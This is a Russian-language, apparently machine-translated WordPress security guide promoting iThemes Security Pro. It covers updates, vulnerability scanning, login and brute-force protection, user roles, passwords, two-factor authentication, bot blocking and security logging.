В конце 2018 года хакеры активно использовали эксплойт в плагине WP GDPR Compliance. Эксплойт позволял неавторизованным пользователям - людям, не вошедшим на веб-сайт - изменять параметры регистрации пользователей WP и изменять новую роль пользователя по умолчанию с подписчика на администратора. К счастью, разработчики плагина WP GDPR Compliance быстро отреагировали и выпустили исправление для уязвимости на следующий день после ее публичного раскрытия.

Но, как и в случае с Exploit Environment, хакеры нацелились на уязвимость, несмотря на то, что был выпущен патч. В течение нескольких дней и недель после раскрытия уязвимости WP GDPR Compliance мы получили шквал сообщений о том, что веб-сайты WordPress были взломаны злоумышленниками, использовавшими эту уязвимость.

Наличие уязвимого плагина или темы, для которой есть исправление, но не применено, является виновником номер один взломанных веб-сайтов WordPress. ЭТО ТАКОЕ РАЗДРАЖЕНИЕ !!!!! Это означает, что большинство взломов WP можно было предотвратить.

Прискорбно думать обо всех людях, которые потратили кучу денег на очистку своего веб-сайта, о доходах, которые они потеряли, когда их сайты были недоступны, и о будущих доходах, которые они потеряли из-за потери доверия своих клиентов. Это еще больше расстраивает, когда вы знаете, что все эти мучения можно было предотвратить с помощью простого обновления.

Функция управления версиями iThemes Security Pro позволяет настраивать и автоматизировать обновления WordPress.

4. Следите за уязвимостями WordPress.

Обновление ваших плагинов и тем не защитит вас от всех уязвимостей WordPress. Некоторые плагины и темы WordPress были оставлены разработчиками, которые их создали.

К сожалению, если заброшенный плагин или тема имеет уязвимость, патч для них никогда не будет. Хакеры будут нацелены на веб-сайты, которые используют эти теперь постоянно уязвимые плагины.

Если у вас есть заброшенный плагин с известной уязвимостью на вашем веб-сайте, вы даете хакерам чертежи, которые им нужны, чтобы захватить ваш сайт. Вот почему вы должны отслеживать все последние уязвимости.

Трудно отслеживать каждую обнаруженную уязвимость WordPress и сравнивать этот список с версиями плагинов и тем, которые вы установили на своем веб-сайте. Отслеживание уязвимостей - это разница между безопасным веб-сайтом и тем, который хакеры могут легко использовать.

Хорошие новости для вас! Мы отслеживаем и публикуем каждую обнаруженную уязвимость в наших обзорах уязвимостей WordPress.

5. Просканируйте свой веб-сайт на наличие уязвимостей.

Более быстрый способ защитить ваш сайт от хакерских атак - это использовать автоматическое сканирование для проверки ваших сайтов на наличие известных уязвимостей.

Сканер сайтов iThemes Security Pro - это ваш способ автоматизировать защиту от уязвимостей на всех ваших веб-сайтах WordPress. Сканер сайта проверяет ваш сайт на наличие известных уязвимостей и автоматически применяет исправление, если оно доступно.

Сайт iThemes Security Pro проверяет 3 типа уязвимостей.

1. Уязвимости WordPress
2. Уязвимости плагина
3. Уязвимости темы

Функция аудита сайта iThemes Sync Pro использует возможности Google Lighthouse для защиты вашего сайта. Аудит сайта проверяет и помечает страницы, которые включают интерфейсные библиотеки JavaScript с известными уязвимостями безопасности.

Разработчики часто используют сторонний код, например JS-библиотеки, в своих плагинах и темах. К сожалению, если библиотеки не обслуживаются должным образом, они могут создавать уязвимости, которые злоумышленники могут использовать для взлома вашего веб-сайта. Использование компонентов с известными уязвимостями входит в список 10 лучших приложений OWASP.

Аудит сайта спас мой бекон! Я создал расписание аудита, чтобы Sync Pro проводил еженедельные автоматические аудиты и отправлял мне отчеты аудита по электронной почте. Я постоянно обновляю все , и поэтому был шокирован, когда во время одного из аудитов своего веб-сайта увидел, что использую библиотеки JavaScript с известными уязвимостями безопасности.

В отчете я указал на устаревшую версию jQuery в каталоге WordPress веб-сайта, усеянную известными уязвимостями! К счастью для меня, в ходе аудита сайта Sync Pro я увидел, что я использовал библиотеки JavaScript с известными уязвимостями безопасности и смог решить проблему до того, как мой сайт был взломан.

Заключение

Правильное управление программным обеспечением, обеспечивающим работу вашего веб-сайта, включая плагины, темы и ядро ​​WordPress, будет иметь большое значение в вашей стратегии безопасности WordPress, защищая ваш сайт от онлайн-злоумышленников.

Раздел 6: Защита вашего входа в WordPress

URL-адрес входа в WordPress одинаков для всех сайтов WordPress и не требует каких-либо специальных разрешений для доступа. Любой, у кого есть опыт работы с WordPress, знает, что URL-адрес для входа находится на странице /wp-login.php .

Доступность страницы входа в WordPress делает ее наиболее атакуемой и потенциально наиболее уязвимой частью любого веб-сайта WordPress. К счастью для нас, плагин iThemes Security Pro упрощает защиту вашего входа в WordPress.

Давайте взглянем на инструменты iThemes Security Pro, которые вы можете использовать для защиты своего входа в WordPress и сделать его почти непроницаемым!

1. Ограничьте количество попыток входа в систему

Первый шаг к защите вашего входа в WordPress - ограничение неудачных попыток входа в систему. По умолчанию в WordPress нет ничего, что ограничивало бы количество неудачных попыток входа в систему. Без ограничения количества неудачных попыток входа в систему, которые может сделать злоумышленник, он может продолжать пробовать комбинацию разных имен пользователей и паролей, пока не найдет тот, который работает.

Функция локальной защиты от грубой силы iThemes Security Pro отслеживает недопустимые попытки входа в систему с хоста или IP-адреса и имени пользователя. Если IP-адрес или имя пользователя сделали слишком много последовательных недействительных попыток входа в систему, они будут заблокированы, и им будет запрещено делать больше попыток в течение установленного периода времени.

Чтобы начать использовать функцию Local Brute Force Protection , включите ее на главной странице страницы настроек iThemes Security Pro.

Параметры локальной защиты от грубой силы позволяют вам устанавливать пороговые значения для блокировок.

• Максимальное количество попыток входа в систему на хост - количество разрешенных недопустимых попыток входа в систему до того, как IP-адрес будет заблокирован.
• Максимальное количество попыток входа на пользователя - это количество недействительных попыток входа в систему, которое разрешено для имени пользователя, прежде чем оно будет заблокировано.
• Минуты для запоминания неправильного входа в систему - это время, в течение которого недопустимая попытка входа в систему должна засчитываться по IP или имени пользователя для блокировки.
• Автоматически блокировать пользователя «admin» - если этот параметр включен, любой, кто использует имя пользователя Admin при входе в систему, получает автоматическую блокировку.

При настройке параметров блокировки следует учитывать несколько моментов. Вы хотите предоставить пользователям недопустимые попытки входа в систему, чем вы даете IP-адреса. Допустим, ваш сайт подвергся атаке методом грубой силы, и злоумышленник использует ваше имя пользователя. Цель состоит в том, чтобы заблокировать IP-адрес злоумышленника, а не ваше имя пользователя, чтобы вы все равно могли войти в систему и выполнить свою работу, даже если ваш веб-сайт находится под атакой.

Вы также не хотите делать эти настройки слишком строгими, устанавливая слишком маленькое количество недействительных попыток входа в систему и слишком долгое время для запоминания недействительных попыток. Если вы уменьшите количество недействительных попыток входа для хостов / IP-адресов до 1 и установите количество минут для запоминания неудачной попытки входа в систему до месяца, вы резко увеличите вероятность непреднамеренной блокировки законных пользователей.

2. Ограничьте количество попыток внешней аутентификации по запросу.

Есть и другие способы входа в WordPress, помимо формы входа. Используя XML-RPC, злоумышленник может сделать сотни попыток ввода имени пользователя и пароля за один HTTP-запрос. Метод усиления грубой силы позволяет злоумышленникам делать тысячи попыток ввода имени пользователя и пароля с помощью XML-RPC всего за несколько HTTP-запросов.

Используя настройки WordPress Tweaks в iThemes Security Pro, вы можете заблокировать несколько попыток аутентификации для каждого запроса XML-RPC. Ограничение количества попыток ввода имени пользователя и пароля до одной для каждого запроса будет иметь большое значение для защиты вашего входа в WordPress.

3. Защита сети от грубой силы

Ограничение попыток входа в систему связано с локальной защитой от перебора. Локальная защита от перебора проверяет только попытки доступа к вашему сайту и блокирует пользователей в соответствии с правилами блокировки, указанными в ваших настройках безопасности.

Защита Network Brute Force делает еще один шаг вперед. Сеть представляет собой сообщество iThemes Security и насчитывает более миллиона веб-сайтов. Если IP-адрес идентифицируется как попытка взлома веб-сайтов в сообществе iThemes Security, этот IP-адрес будет добавлен в список запрещенных Network Bruce Force.

Как только IP-адрес попадает в список запрещенных Network Brute Force, IP-адрес блокируется на всех веб-сайтах в сети. Итак, если IP-адрес атакует мой веб-сайт и будет заблокирован, об этом будет сообщено в iThemes Security Brute Force Network. Мой отчет может помочь получить запрет на IP во всей сети. Мне нравится, что я могу помочь защитить вход в WordPress других людей, просто включив iThemes Security Network Protection.

Чтобы начать использовать Network Force Protection , включите его на главной странице настроек безопасности.

Затем введите свой адрес электронной почты, выберите, хотите ли вы получать обновления по электронной почте, а затем нажмите кнопку « Сохранить» .

4. Ограничьте доступ устройств к панели управления WP.

Последний шаг к защите вашего входа в WordPress - это ограничение доступа к вашей панели управления WordPress для набора устройств. Функция надежных устройств iThemes Security Pro определяет устройства, которые вы и другие пользователи используете для входа на свой сайт WordPress. Когда пользователь вошел в систему на нераспознанном устройстве, доверенные устройства могут ограничить свои возможности на уровне администратора. Это означает, что хакер смог обойти другие ваши методы безопасности входа - маловероятно - у них не будет возможности вносить какие-либо злонамеренные изменения на ваш сайт.

Чтобы начать использовать доверенные устройства , включите их на главной странице параметров безопасности, а затем нажмите кнопку « Настроить параметры» .

В настройках «Надежные устройства» выберите пользователей, которым вы хотите использовать эту функцию, а затем включите функции « Ограничение возможностей» и « Защита от перехвата сеанса» .

После включения нового параметра «Надежные устройства» пользователи получат уведомление в панели администратора WordPress о незавершенных нераспознанных устройствах. Если ваше текущее устройство не было добавлено в список доверенных устройств, щелкните ссылку « Подтвердить это устройство», чтобы отправить письмо для авторизации .

Нажмите кнопку « Подтвердить устройство» в электронном письме о неопознанном входе в систему, чтобы добавить текущие устройства в список надежных устройств.

Заключение

Доступность страницы входа в WordPress делает ее наиболее атакуемой и потенциально уязвимой частью любого сайта WordPress. Однако выполнение шагов, описанных в этом разделе, сделает ваш вход в WordPress практически недоступным.

Раздел 7: Защита ваших пользователей WordPress

Всякий раз, когда мы говорим о безопасности пользователей, мы часто слышим такие вопросы, как: должен ли каждый пользователь WordPress иметь одинаковые требования к безопасности, и насколько безопасность слишком велика?

Не волнуйся. Мы отвечаем на все эти вопросы. Но сначала давайте поговорим о разных типах пользователей WordPress.

Какие существуют типы пользователей WordPress?

Есть 5 различных пользователей WordPress по умолчанию.

1. Администратор
2. редактор
3. Автор
4. Автор
5. Подписчик

У каждого пользователя разные возможности. Возможности диктуют, что они могут делать после доступа к панели управления. Узнайте больше о пользовательских ролях и разрешениях WordPress.

Потенциальный ущерб от различных взломанных пользователей WordPress

Прежде чем мы сможем понять, как защитить наших пользователей WordPress, мы должны сначала понять уровень угрозы каждого типа взломанного пользователя. Тип и уровень ущерба, который может нанести злоумышленник, сильно различаются в зависимости от ролей и возможностей пользователя, которого они взламывают.

Администратор - уровень угрозы высокий

Пользователи- администраторы могут делать все, что захотят.

• Создавать, удалять и изменять пользователей.
• Устанавливайте, удаляйте и редактируйте плагины и темы.
• Создавайте, удаляйте и редактируйте все сообщения и страницы.
• Публикуйте и отменяйте публикацию сообщений и страниц.
• Добавляйте и удаляйте медиа.

Если хакеру удастся заполучить одного из администраторов вашего сайта, они могут удержать ваш сайт с целью выкупа. Как мы упоминали ранее, программа- вымогатель - это когда хакер захватывает ваш веб-сайт и не вернет его вам, если вы не заплатите ему огромную плату.

Редактор - Уровень угрозы высокий

Редактор управляет всем содержанием сайта. У этих пользователей все еще есть немного власти.

• Создавайте, удаляйте и редактируйте все сообщения и страницы.
• Публикуйте и отменяйте публикацию всех сообщений и страниц.
• Загрузите медиафайлы.
• Управляйте всеми ссылками.
• Управляйте комментариями.
• Управляйте категориями.

Если злоумышленник получит контроль над учетной записью редактора, он может изменить одну из ваших страниц для использования в фишинг-атаке. Фишинг - это тип атаки, используемый для кражи пользовательских данных, включая учетные данные для входа и номера кредитных карт.

Фишинг - один из самых надежных способов внести ваш сайт в черный список Google. Каждый день 10 000 сайтов попадают в черный список Google по разным причинам.

Автор - Уровень угрозы Средний

Автор был разработан для создания и управления собственным контентом.

• Создавать, удалять и редактировать собственные сообщения и страницы.
• Публикуйте и отменяйте свои собственные сообщения.
• Загрузить медиафайлы

Если злоумышленник получит контроль над учетной записью автора, он сможет создавать страницы и сообщения, которые отправляют посетителей вашего сайта на вредоносные веб-сайты.

Автор и подписчик - низкий уровень угрозы

Участник - это облегченная версия роли пользователя Автор. У них нет издательской власти.

• Создавать и редактировать собственные сообщения.
• Удалять собственные неопубликованные сообщения.

Подписчик может читать то, что публикуют другие пользователи.

Хотя хакеры с ролью участника или подписчика не могут вносить вредоносные изменения, они могут украсть любую конфиденциальную информацию, хранящуюся в учетной записи или на странице профиля пользователя.

6 советов по защите ваших пользователей WordPress

Итак, это довольно неприятные вещи, которые хакеры могут сделать с нашими веб-сайтами. Хорошей новостью является то, что большинство атак на ваши учетные записи пользователей WordPress можно предотвратить, приложив немного усилий с вашей стороны.

Давайте посмотрим, что вы можете сделать, чтобы защитить своих пользователей WordPress. На самом деле эти методы безопасности WordPress помогут обезопасить всех пользователей WordPress. Но по мере того, как мы рассмотрим каждый из методов, мы сообщим вам, какие пользователи должны использовать этот метод.

1. Предоставляйте людям только те возможности, которые им нужны

Самый простой способ защитить свой веб-сайт - предоставить пользователям только те возможности, которые им нужны, и ничего более. Если единственное, что кто-то собирается делать на вашем веб-сайте, - это создавать и редактировать свои собственные сообщения в блоге, им не нужна возможность редактировать сообщения других людей.

2. Защитите пользователей WordPress с помощью надежных паролей.

В списке, составленном Splash Data, наиболее распространенным паролем, включенным во все дампы данных, был 123456. Дамп данных - это взломанная база данных, заполненная паролями пользователей, сброшенными где-то в Интернете. Можете ли вы представить, сколько людей на вашем сайте используют слабый пароль, если 123456 - самый распространенный пароль в свалках данных?

Использование ненадежного пароля похоже на попытку заблокировать входную дверь куском ленты. Хакерам никогда не требовалось много времени, чтобы взломать слабый пароль на веб-сайте. Теперь, когда хакеры используют в своих атаках компьютерные видеокарты, время, необходимое для взлома пароля, никогда не было меньше.

Например, давайте взглянем на диаграмму, созданную Terahash, высокопроизводительной компанией по взлому паролей. Их диаграмма показывает время, необходимое для взлома пароля с использованием кластера хэш-стека 448x RTX 2080.

По умолчанию WordPress использует MD5 для хеширования паролей пользователей, хранящихся в базе данных WP. Итак, согласно этой таблице, Terahash может взломать пароль из 8 символов… почти мгновенно. Это не только супер впечатляет, но и очень страшно. Хорошая новость заключается в том, что мы можем защитить наш вход в WordPress, потребовав от наших высокоуровневых пользователей использовать надежные пароли.

Функция требования к паролям iThemes Security Pro позволяет заставить определенных пользователей использовать надежный пароль. Включите функцию « Требования к паролю» на главной странице настроек безопасности, а затем выберите пользователей, которым требуется использовать надежный пароль.

3. Отказаться от взломанных паролей

Согласно отчету Verizon Data Breach Investigations Report, более 70% сотрудников повторно используют пароли на работе. Но наиболее важным показателем из отчета является то, что в 81% взломов использовались украденные или ненадежные пароли.

Хакеры используют форму атаки методом грубой силы, называемую атакой по словарю. Атака по словарю - это метод взлома веб-сайта WordPress с часто используемыми паролями, которые появляются в дампах базы данных. «Сборник №1? Нарушение данных, размещенное на MEGA, включало 1 160 253 228 уникальных комбинаций адресов электронной почты и паролей. Это миллиард с буквой b. Такой результат действительно поможет словарной атаке сузить наиболее часто используемые пароли WordPress.

Это необходимо, чтобы пользователи с возможностями уровня автора и выше не могли использовать скомпрометированные пароли для защиты вашего входа в WordPress. Вы также можете подумать о том, чтобы не позволять пользователям нижнего уровня использовать скомпрометированные пароли.

Это совершенно понятно и рекомендуется максимально упростить создание новой учетной записи. Однако ваш клиент может не знать, что используемый им пароль был найден в дампе данных. Вы окажете своим клиентам отличную услугу, предупредив их о том, что пароль, который они используют, был скомпрометирован. Если они используют этот пароль повсюду, вы можете избавить их от серьезных головных болей в будущем.

Функция iThemes Security Pro «Отказаться от взломанных паролей» заставляет пользователей использовать пароли, которые не появлялись ни при каких нарушениях пароля, отслеживаемых с помощью Have I Been Pwned. Включите функцию « Требования к паролю» на главной странице настроек безопасности, а затем выберите пользователей, которым вы хотите запретить использование взломанного пароля.

4. Защитите пользователей WordPress с помощью двухфакторной аутентификации.

Использование двухфакторной аутентификации - лучшее, что вы можете сделать для защиты входа в WordPress. Двухфакторная аутентификация - это процесс проверки личности человека, требующий двух отдельных методов проверки. Google поделился в своем блоге, что использование двухфакторной аутентификации может остановить 100% автоматических атак ботов. Мне очень нравятся эти шансы.

Функция двухфакторной аутентификации iThemes Security Pro обеспечивает большую гибкость при внедрении 2fa на вашем веб-сайте. Вы можете включить двухфакторный режим для всех или некоторых ваших пользователей, и вы можете заставить своих высокоуровневых пользователей использовать 2fa при каждом входе в систему.

Для вашего удобства iThemes Security Pro предлагает 2 различных метода двухфакторной аутентификации.

1. Мобильное приложение. Метод мобильного приложения - самый безопасный метод двухфакторной аутентификации, предоставляемый iThemes Security Pro. Этот метод требует, чтобы вы использовали бесплатное двухфакторное мобильное приложение, такое как Authy.
2. Электронная почта - двухфакторный метод электронной почты отправляет чувствительные ко времени коды на адрес электронной почты вашего пользователя.
3. Резервные коды - набор одноразовых кодов, которые можно использовать для входа в систему в случае утери основного двухфакторного метода.

5. Защитите пользователей WordPress от взлома сеанса

WordPress генерирует файл cookie сеанса каждый раз, когда вы входите на свой сайт. Допустим, у вас есть расширение для браузера, от которого разработчик отказался и больше не выпускает обновления безопасности. К сожалению для вас, в запущенном расширении браузера есть уязвимость. Уязвимость позволяет злоумышленникам захватить файлы cookie вашего браузера, включая ранее упомянутый файл cookie сеанса WordPress. Этот тип взлома известен как перехват сеанса . Таким образом, злоумышленник может воспользоваться уязвимостью расширения, чтобы воспользоваться вашим логином и начать вносить вредоносные изменения с вашим пользователем WordPress.

У вас должна быть защита от перехвата сеанса для ваших администраторов и редакторов.

Благодаря функции надежных устройств iThemes Security Pro перехват сеанса ушел в прошлое. Если устройство пользователя изменится во время сеанса, iThemes Security автоматически выйдет из системы, чтобы предотвратить любые несанкционированные действия в учетной записи пользователя, такие как изменение адреса электронной почты пользователя или загрузка вредоносных подключаемых модулей.

6. Создайте пользователя универсальной поддержки.

Каждый раз, когда вы создаете нового пользователя, вы добавляете еще одну точку входа, которую может использовать хакер. Но, вероятно, будут случаи, когда вам может понадобиться помощь извне для вашего веб-сайта, например, когда вы ищете поддержку или после найма независимого подрядчика. Вам нужен безопасный способ добавить временный доступ администратора к вашему сайту.

Например, предположим, что у вас возникли проблемы с одним из плагинов, установленных на вашем веб-сайте. После обращения в службу поддержки они запрашивают доступ администратора к вашему сайту, чтобы они могли изучить его поближе. Это кажется вполне разумным запросом, и вы решаете предоставить им доступ.

Так как же предоставить временному администратору доступ к нашему сайту WordPress?

Предоставление внешнего доступа к вашему сайту: два варианта

Как правило, у вас есть два варианта предоставления внешнего доступа к вашему сайту…. и ни то, ни другое не велико .

1. Поделитесь своими учетными данными

Ваш первый и худший вариант - поделиться именем пользователя и паролем администратора WordPress.

Почему делиться своими учетными данными администратора ужасно

• Сниженная безопасность - если вы поделитесь учетными данными своего пользователя, вам придется отключить двухфакторную аутентификацию, чтобы позволить человеку, использующему ваши учетные данные, войти в систему. Google поделился в своем блоге, что использование двухфакторной аутентификации или двухэтапной аутентификации может остановить 100% автоматических атак ботов. Отключение двухфакторной аутентификации даже на короткий период времени резко снижает безопасность вашего сайта.
• Неудобно - для обмена учетными данными необходимо изменить пароль. Если вы забыли сменить пароль, у одного или нескольких человек есть доступ администратора к вашему сайту, когда они этого захотят.

2. Создайте нового пользователя для службы поддержки

Хотя создание нового пользователя-администратора для специалиста службы поддержки лучше, чем делиться своими учетными данными администратора, это все равно не очень хорошо.

Почему создание пользователя для службы поддержки - это ужасно

• Повышенная уязвимость - создание нового пользователя-администратора добавляет еще одну точку входа, которая может быть использована. Если у вас нет политики паролей, служба поддержки может выбрать слабый пароль, что сделает ваш логин WordPress более уязвимым для атак.
• Неудобно - настройка нового пользователя в любое время, когда вам потребуется помощь извне, занимает много времени. Вы должны создать нового пользователя, а затем не забыть удалить пользователя, когда ему больше не нужен доступ к вашему сайту. Лучшей практикой безопасности WordPress является удаление любых неиспользуемых пользователей с вашего сайта.

Что такое повышение привилегий?

Функция повышения привилегий iThemes Security Pro позволяет временно предоставить пользователю дополнительные возможности.

Повышение привилегий позволяет легко и безопасно создать универсального пользователя, которого вы можете предоставить любым сторонним разработчикам или техническим специалистам, которым требуется временный доступ к вашему веб-сайту.

С помощью повышения привилегий вы можете создать нового пользователя, назвать его «Поддержка» и назначить ему роль подписчика. В следующий раз, когда вам потребуется предоставить временный доступ к вашему веб-сайту, вы можете переключить пользователя службы поддержки с подписчика на администратора. Позже мы рассмотрим, как это сделать, но сначала давайте поговорим о том, почему повышение привилегий - лучший способ предоставить доступ к вашему веб-сайту.

Почему повышение привилегий лучше

• Легко - вам не нужно создавать нового пользователя каждый раз, когда вам нужно предоставить доступ к вашему сайту.
• Автоматически - повышение привилегий длится всего 24 часа. По истечении 24 часов пользователь автоматически теряет все дополнительные привилегии. Вам не нужно помнить об удалении пользователей или изменении паролей.
• Никаких жертв в области безопасности - вы все равно можете потребовать от этого универсального пользователя поддержки использовать двухфакторный метод электронной почты для входа в систему, что означает, что у вас такой же уровень безопасности, как и у других пользователей-администраторов. Поскольку фактическая роль пользователя - это подписчик, вы не рискуете оставить ее на своем веб-сайте.

Как использовать повышение привилегий в iThemes Security Pro

Для начала включите повышение привилегий на главной странице настроек безопасности.

Вы можете создать нового пользователя и назвать его «Поддержка» и присвоить ему роль «Подписчик». В следующий раз, когда вам потребуется предоставить временный доступ к своему веб-сайту, перейдите на страницу профиля пользователя службы поддержки.

Обновите адрес электронной почты, чтобы позволить внешнему специалисту службы поддержки запросить новый пароль. Затем прокрутите вниз, пока не увидите настройки временного повышения привилегий. Щелкните переключатель « Установить временную роль» и выберите «Администратор». Теперь у пользователя будет доступ администратора в течение следующих 24 часов.

Если им не нужны полные 24 часа, вы можете отозвать повышение привилегий на странице профиля пользователя. Если вам нужно более 24 часов, вы можете указать точное количество дней, которое вам нужно, в поле « Дни» .

Заключение

Популярность WordPress делает его мишенью для хакеров по всему миру. Как мы уже говорили, злоумышленник может нанести ущерб, взломав даже самый низкий уровень пользователя WordPress.

Хорошая новость заключается в том, что, хотя нет способа предотвратить атаки на ваших пользователей WordPress, приложив немного усилий с нашей стороны, мы можем предотвратить успешные атаки.

Раздел 8: Защитите свой сайт от вредоносных ботов

В этом разделе руководства по безопасности WordPress вы узнаете, что такое бот и как помешать плохим ботам создавать хаос на вашем сайте.

Что такое бот?

Бот - это программа, которая запрограммирована для выполнения определенного списка задач. Разработчики создают набор инструкций, которым бот будет следовать автоматически, и разработчику не нужно сообщать им, чтобы они начали работу. Боты будут выполнять повторяющиеся и рутинные задачи намного быстрее, чем мы.

Различные боты постоянно сканируют ваш сайт. Некоторые из этих ботов хороши и предоставляют вам ценные услуги. У других ботов более гнусные мотивы. Давайте поговорим о том, что такое бот и о различных типах ботов.

Хорошие боты

Мониторинг ботов - iThemes Sync Pro Uptime Monitoring использует бота для мониторинга времени работы вашего сайта. Бот проверяет ваш сайт каждые 5 минут, чтобы убедиться, что он все еще в сети. Если ваш веб-сайт не работает, бот отправит вам уведомление, чтобы вы могли снова подключить его к сети.

Аудит ботов - iThemes Sync Pro Site Audit использует бота Google Lighthouse для проверки качества ваших веб-страниц. Еще один отличный пример бота-аудитора - программа проверки неработающих ссылок, которая будет сканировать ваш веб-сайт в поисках ссылок, которые отправляют вас в несуществующее место.

Боты-фидеры . Отличным примером ботов-фидеров является проигрыватель подкастов. Ваш проигрыватель подкастов использует бота для отслеживания RSS-каналов подкастов, на которые вы подписаны, и предупреждает вас, когда ваш любимый подкаст выпускает новый выпуск.

Боты поисковой системы - веб-сканер Google является примером бота поисковой системы. Этот тип ботов будет сканировать ваш сайт в поисках новых или измененных страниц и создавать индекс вашего сайта. Как только у Google или другой поисковой системы будет индекс вашего веб-сайта, они смогут делиться вашими страницами с людьми, использующими их поисковую систему.

Боты безопасности - сканирование сайта iThemes Security Pro использует бота для сравнения списка установленных плагинов и тем с нашей базой данных уязвимостей. Если у вас установлен плагин или тема с известной уязвимостью, бот автоматически применит исправление, если оно доступно.

Плохие боты

Боты для очистки контента - эти боты запрограммированы на загрузку содержимого вашего веб-сайта без вашего разрешения. Бот может дублировать контент для использования на сайте злоумышленника, чтобы улучшить его SEO и украсть трафик вашего сайта.

Спам-боты - спам-боты надоедают. Они будут портить ваши комментарии обещаниями стать миллионером, работая из дома, в надежде отправить ваших посетителей на вредоносные веб-сайты.

Боты грубой силы - боты грубой силы рыщут в Интернете в поисках логинов WordPress для атаки. Как только эти боты попадают на страницу входа, они пробуют простейшую форму получения доступа к сайту: снова и снова пытаются угадывать имена пользователей и пароли, пока не добьются успеха.

Как блокировать плохих ботов, не блокируя хороших: reCAPTCHA V3

Google reCAPTCHA помогает уберечь плохих роботов от злонамеренных действий на вашем веб-сайте, таких как попытки взлома вашего веб-сайта с использованием скомпрометированных паролей, размещение спама или даже очистка вашего контента.

Однако законные пользователи смогут входить в систему, совершать покупки, просматривать страницы или создавать учетные записи. reCAPTCHA использует передовые методы анализа рисков, чтобы различать людей и ботов.

Функция Google reCAPTCHA в iThemes Security Pro защищает ваш сайт от плохих ботов. Эти боты пытаются проникнуть на ваш сайт, используя взломанные пароли, отправляя спам или даже очищая ваш контент. reCAPTCHA использует передовые методы анализа рисков, чтобы различать людей и ботов.

Что замечательно в reCAPTCHA версии 3, так это то, что она помогает вам обнаруживать злонамеренный трафик ботов на вашем веб-сайте без какого-либо взаимодействия с пользователем. Вместо того, чтобы показывать вызов CAPTCHA, reCAPTCHA v3 отслеживает различные запросы, сделанные на вашем сайте, и возвращает оценку для каждого запроса. Оценка варьируется от 0,01 до 1. Чем выше оценка reCAPTCHA, тем больше уверенности в том, что запрос сделал человек. Чем ниже этот показатель, возвращаемый reCAPTCHA, тем больше уверенности в том, что бот сделал запрос.

iThemes Security Pro позволяет установить порог блокировки с помощью оценки reCAPTCHA. Google рекомендует использовать 0,5 по умолчанию. Имейте в виду, что вы можете случайно заблокировать законных пользователей, если установите слишком высокий порог.

Вы можете включить reCAPTCHA при регистрации пользователя WordPress, сбросить пароль, логин и комментарии. iThemes Security Pro позволяет запускать скрипт Google reCAPTCHA на всех страницах, чтобы повысить точность оценки его бота по сравнению с человеческим.

Заключение

Есть хорошие боты и плохие боты. reCAPTCHA блокирует плохих ботов с вашего сайта, не мешая хорошим ботам, которые приносят пользу.

Раздел 9: Журналы безопасности WordPress

Ведение журнала - важная часть вашей стратегии безопасности WordPress. Недостаточное ведение журнала и мониторинг могут привести к задержке обнаружения нарушения безопасности. Большинство исследований показывают, что время обнаружения нарушения составляет более 200 дней! Это время позволяет злоумышленнику взломать другие системы, изменить, украсть или уничтожить больше данных. Именно по этим причинам недостаточное ведение журнала попало в топ-10 рисков безопасности веб-приложений по версии OWASP.

Журналы безопасности WordPress имеют несколько преимуществ в вашей общей стратегии безопасности.

1. Идентификация и пресечение злонамеренного поведения.
2. Выявляйте действия, которые могут предупредить вас о взломе.
3. Оцените, какой ущерб был нанесен.
4. Помощник по ремонту взломанного сайта.

Если ваш сайт все-таки взломали, вам понадобится лучшая информация, которая поможет вам в быстром расследовании и восстановлении.

Что такое журналы безопасности WordPress?

Журналы безопасности WordPress в iThemes Security Pro отслеживают важные события безопасности, которые происходят на вашем веб-сайте. Эти события важно отслеживать, чтобы указать, когда или когда происходит нарушение безопасности.

Журналы безопасности вашего веб-сайта являются важной частью любой стратегии безопасности. Информация, содержащаяся в этих записях, может использоваться для блокировки злоумышленников, выделения нежелательных изменений на сайте и помощи в выявлении и исправлении точки входа успешной атаки.

События безопасности, отслеживаемые и регистрируемые iThemes Security

Вот посмотрите на события безопасности WordPress, отслеживаемые плагином iThemes Security Pro.

1. Атаки методом перебора WordPress

Атаки грубой силы относятся к методу проб и ошибок, который используется для обнаружения имен пользователей и паролей для взлома веб-сайта. WordPress не отслеживает никакую активность пользователей в системе, поэтому в WordPress нет ничего, что могло бы защитить вас от атаки методом грубой силы. Вы должны следить за безопасностью входа в систему, чтобы защитить свой сайт WordPress.

К счастью, атака методом грубой силы не очень сложна, и ее довольно легко идентифицировать в ваших журналах. Вам нужно будет записать имя пользователя и IP-адрес, который пытается войти в систему, и был ли вход успешным. Если вы видите, что одно имя пользователя или IP-адрес имеют последовательные неудачные попытки входа в систему, скорее всего, вы подверглись атаке методом грубой силы.

Как только вы узнаете, что ваш сайт подвергся атаке, вы можете положить этому конец! Важно помнить, что невозможно предотвратить атаку на ваш сайт. Но, отслеживая недействительные попытки входа в систему, вы можете предотвратить успех этих атак.

iThemes Security Pro отлично справляется с блокировкой плохих парней. Однако, если злоумышленник использовал имя пользователя Боб в атаке методом грубой силы, а Боб является фактическим пользователем сайта, Боб, к сожалению, будет заблокирован вместе со злоумышленником.

Несмотря на то, что здорово мешать злоумышленникам взломать сайт, нам не нравится, когда безопасность влияет на работу реальных пользователей. Мы создали Magic Links, чтобы позволить легитимным пользователям обойти блокировку имени пользователя, в то время как злоумышленник остается заблокированным.

2. Сканирование на вредоносное ПО

Вы должны не только запускать сканирование на наличие вредоносных программ, но также записывать результаты каждого сканирования на наличие вредоносных программ в журналах безопасности WordPress. Некоторые журналы безопасности будут записывать только результаты сканирования, обнаружившего вредоносное ПО, но этого недостаточно. Крайне важно как можно быстрее получать уведомления о взломе вашего веб-сайта. Чем дольше вы узнаете о взломе, тем больший ущерб он нанесет.

Хотя приятно видеть, как история упреждающего подхода к обеспечению безопасности окупается, это всего лишь бонус, а не причина записывать каждое сканирование на наличие вредоносных программ.

Если вы не документируете запланированные сканирования, у вас не будет возможности узнать, есть ли какие-либо сбои сканирования. Отсутствие записи неудачных сканирований может привести к тому, что вы подумаете, что ваш сайт ежедневно проверяется на наличие вредоносных программ, но на самом деле сканирование не завершается.

Прочтите обзор функции Site Scan, чтобы узнать, как iThemes Security Pro может защитить вас от основной причины взломов WordPress.

3. Активность пользователей

Ведение записей об активности пользователей в журналах безопасности WordPress может быть вашей спасительной возможностью после успешной атаки.

Если вы отслеживаете правильную активность пользователей, он может провести вас через временную шкалу взлома и показать все, что изменил хакер, от добавления новых пользователей до добавления нежелательной фармацевтической рекламы на ваш сайт.

iThemes Security Pro отслеживает 5 типов активности пользователей:

1. Войти / выйти

